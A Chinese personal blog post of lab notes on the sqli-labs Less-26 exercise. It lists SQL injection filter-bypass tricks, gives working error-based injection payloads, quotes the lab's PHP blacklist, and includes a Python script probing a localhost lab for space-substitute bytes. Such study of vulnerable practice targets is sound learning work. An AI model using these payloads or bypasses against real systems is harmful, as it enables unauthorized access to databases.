<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title> sql注入笔记4 · 小阔的bug日常</title><meta name="description" content="sql注入笔记4 - 小阔"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/favicon.png"><link rel="stylesheet" href="/css/apollo.css"><link rel="search" type="application/opensearchdescription+xml" href="https://huaerjiejue.github.io/atom.xml" title="小阔的bug日常"><meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="小阔的bug日常" type="application/atom+xml">
</head><body><div class="wrap"><header><a href="/" class="logo-link"><img src="/favicon.png" alt="logo"></a><ul class="nav nav-list"><li class="nav-list-item"><a href="/" target="_self" class="nav-list-link">BLOG</a></li><li class="nav-list-item"><a href="/archives/" target="_self" class="nav-list-link">ARCHIVE</a></li><li class="nav-list-item"><a href="/atom.xml" target="_self" class="nav-list-link">RSS</a></li></ul></header><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">sql注入笔记4</h1><div class="post-info">2023年1月15日</div><div class="post-content"><p>  哎，最近好忙，一堆事，但是学习还是不能丢下的，今天是sqllab-26，这关是过滤了空格，注释符，and，or，好家伙，这么丧心病狂可不好。</p>
<p>  首先，先列一下常见的绕过方式：</p>
<ol>
<li>双写绕过</li>
<li>大小写绕过</li>
<li>编码绕过，如：hex || URL</li>
<li>注释符绕过，如：&#x2F;<em>!select</em>&#x2F;</li>
<li>替换：如 and 可替换为 &amp;&amp; ,or 可替换为 ||，这两个字符也可以转换成相应的url格式</li>
<li>空格的话我们可以 url 绕过：%a0 || %0b 等等，过滤字符我们可以用 and || or 替代</li>
</ol>
<p>补充一点，空格还可以通过（）绕过，这关就是酱紫，还是写个例子吧：</p>
<p><code>id=1 and 1=1</code></p>
<p>这关是有单引号，还不可以使用注释符，所以就手工加上单引号呗，然后and要双写或者使用&amp;&amp;，空格要使用（），所以一个成功的payload如下：</p>
<p><code>id=-1‘&amp;&amp;(1=1)||&#39;1&#39;=&#39;1</code></p>
<p>其中and 1&#x3D;1就可以插入恶意语句了，就可以了，例如</p>
<p><code>?id=-1&#39; || updatexml(1,concat(0x7e,database()),1) || &#39;1&#39;=&#39;1</code></p>
<p>下面是这关的过滤函数，说实话，真的有的难，哭了</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">`<span class="function"><span class="keyword">function</span> <span class="title">blacklist</span>(<span class="params"><span class="variable">$id</span></span>) </span>&#123;      <span class="variable">$id</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/or/i&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);      <span class="comment">//strip out OR (non case sensitive)     </span></span><br><span class="line">                                <span class="variable">$id</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/and/i&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);      <span class="comment">//Strip out AND (non case sensitive)      </span></span><br><span class="line">                                <span class="variable">$id</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[\/\*]/&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);      <span class="comment">//strip out /*      </span></span><br><span class="line">                                <span class="variable">$id</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[--]/&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);      <span class="comment">//Strip out --       </span></span><br><span class="line">                                <span class="variable">$id</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[#]/&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);      <span class="comment">//Strip out #      </span></span><br><span class="line">                                <span class="variable">$id</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[\s]/&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);      <span class="comment">//Strip out spaces      </span></span><br><span class="line">                                <span class="variable">$id</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/[\/\\\\]/&#x27;</span>,<span class="string">&quot;&quot;</span>, <span class="variable">$id</span>);      <span class="comment">//Strip out slashes      return $id; &#125;`</span></span><br></pre></td></tr></table></figure>

<p>我感觉，应该找个时间把相应的sql语句和一些绕过做一些总结，可是至少需要把靶场都跑玩吧。</p>
<p>又又又来补充了，<a target="_blank" rel="noopener" href="https://blog.csdn.net/kukudeshuo/article/details/114707072">sql-26</a>这个网站作者给了一段python代码用来跑一共有多少种可以代替空格的字符，代码较为简单，但是也值得学习一下，毕竟咱现在是菜鸟，</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>, <span class="number">256</span>):</span><br><span class="line">    <span class="comment">#print(i)</span></span><br><span class="line">    code = <span class="built_in">hex</span>(i).replace(<span class="string">&#x27;0x&#x27;</span>, <span class="string">&#x27;&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(code) &lt; <span class="number">2</span>:</span><br><span class="line">        code = <span class="string">&quot;0&quot;</span> + code</span><br><span class="line">    code_0x = <span class="string">&quot;%&quot;</span> + code</span><br><span class="line">    <span class="comment">#print(code_0x)</span></span><br><span class="line">    url = <span class="string">&quot;http://127.0.0.1/sql1/Less-26/?id=1&#x27;&quot;</span> + code_0x + <span class="string">&quot;%26%26&quot;</span> + code_0x + <span class="string">&quot;&#x27;1&#x27;=&#x27;1&quot;</span></span><br><span class="line">    r = requests.get(url=url)</span><br><span class="line">    <span class="keyword">if</span> <span class="string">&quot;Dumb&quot;</span> <span class="keyword">in</span> r.content.decode(<span class="string">&quot;utf-8&quot;</span>,<span class="string">&quot;ignore&quot;</span>):</span><br><span class="line">        <span class="built_in">print</span>(code_0x) </span><br></pre></td></tr></table></figure>

<p>这段代码张主要有两个东西要学习一下吧，也是我不知道的地方</p>
<p>第一点，是<code>code = hex(i).replace(&#39;0x&#39;, &#39;&#39;)</code>这个东东，hex（）是python中的一个函数，用于转换成16进制，后面的replace是用来去除16进制数前面的标识符0x的。</p>
<p>第二点，是 &#96;&#96;if “Dumb” in r.content.decode(“utf-8”,”ignore”)&#96;这其中，r.content用于显示响应内容的字节格式，r.content.decode…是对字节对象转换成字符串对象，后面的ignore意味着响应中的任何无效字节都将被忽视，不会导致错误。</p>
</div></article></div></main><footer><div class="paginator"><a href="/2023/01/18/sqli-26a/" class="prev">PREV</a><a href="/2023/01/13/gameshell%E5%91%BD%E4%BB%A4%E6%80%BB%E7%BB%93/" class="next">NEXT</a></div><div class="copyright"><p>© 2015 - 2023 <a href="https://huaerjiejue.github.io">小阔</a>, powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/pinggod/hexo-theme-apollo" target="_blank">hexo-theme-apollo</a>.</p></div></footer></div><script async src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js?config=TeX-MML-AM_CHTML" integrity="sha384-crwIf/BuaWM9rM65iM+dWFldgQ1Un8jWZMuh3puxb8TOY9+linwLoI7ZHZT+aekW" crossorigin="anonymous"></script></body></html>